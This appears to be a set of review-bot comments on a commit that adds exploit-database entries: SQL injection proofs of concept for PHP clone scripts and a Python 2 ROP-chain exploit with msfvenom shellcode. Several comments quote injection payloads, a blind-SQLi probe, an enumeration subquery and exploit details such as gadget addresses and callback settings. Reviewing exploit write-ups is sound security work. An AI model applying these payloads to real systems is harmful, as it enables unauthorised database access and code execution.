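Review bot: both injection points in 43240.txt take a 32-hex-character value before the quote (`-91a87ff679a2f3e71d9181a67b7542122c'`, `-34202cb962ac59075b964b07152d234b70'`), which suggests `cat` and `sc` are hash-like string identifiers compared as strings in the query rather than integers; the description should say so, because the common advice of casting the parameter to an integer would not close this sink, whereas binding it in a prepared statement would. Neither the `Exploit Title` nor the `Description` mentions that two separate pages (`browse-category.php`, `browse-scategory.php`) are affected, while the CSV title (`'cat' / 'sc'`) does.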
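Review bot: the hunks for 43241.txt and 43242.txt each declare 30 added lines (`@@ -0,0 +1,30 @@`), and the diffstat agrees (`30 ++++++++` for both), but every added line shown here is blank, so the FS Stackoverflow Clone and FS Shutterstock Clone entries named in the commit message cannot be reviewed; confirm that the file bodies are present in the commit and not only in this rendering.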
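Review bot: the proof of concept in 43243.txt is pasted in sqlmap's report format (`Parameter: productid (GET)`, `Type: boolean-based blind`, `Title: ...`, `Payload: productid=609 AND 2165=2165`) without saying so, and it shows only the always-true probe, so a reader cannot tell what response difference was observed between the true and false cases; state the tool and the observable (page content or length difference) that confirmed the blind injection, since that is what a maintainer needs to reproduce the finding and verify a fix.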
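Review bot: 43245.txt ends with two empty comment lines before the closing `# # # # #` footer and, unlike its sibling entries in this commit, gives only the raw payload without the `http://server/...` form; pick one convention for the whole batch. The enumeration subquery (`SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),...`) is identical to the one in 43244.txt, which is worth a one-line note so the two entries are maintained together.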
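Review bot: 43236.py is Python 2 only but its shebang is `#!/usr/bin/env python`: `shellcode` is built as a text string and `create_rop_chain` returns `''.join(struct.pack(...))`, which under Python 3 raises a `TypeError` because `struct.pack` returns `bytes` and `str.join` rejects them; use `#!/usr/bin/env python2` or state the interpreter version in the header. The ROP chain is a list of fixed `0x7c3...` addresses annotated `[msvcr71.dll]` with no comment stating the precondition that this module is loaded by the client at the base those addresses assume on the stated Windows 7 x86 target; that assumption is the reason the chain can be hard-coded and belongs next to the gadget list, together with a note on the msfvenom line that the embedded `LHOST=192.168.0.12 LPORT=34` are the author's values. The gadget `0xffffffff, #` has an empty comment. The file as shown is cut off at `return ''.join(struct.pack('`, so the remainder could not be reviewed.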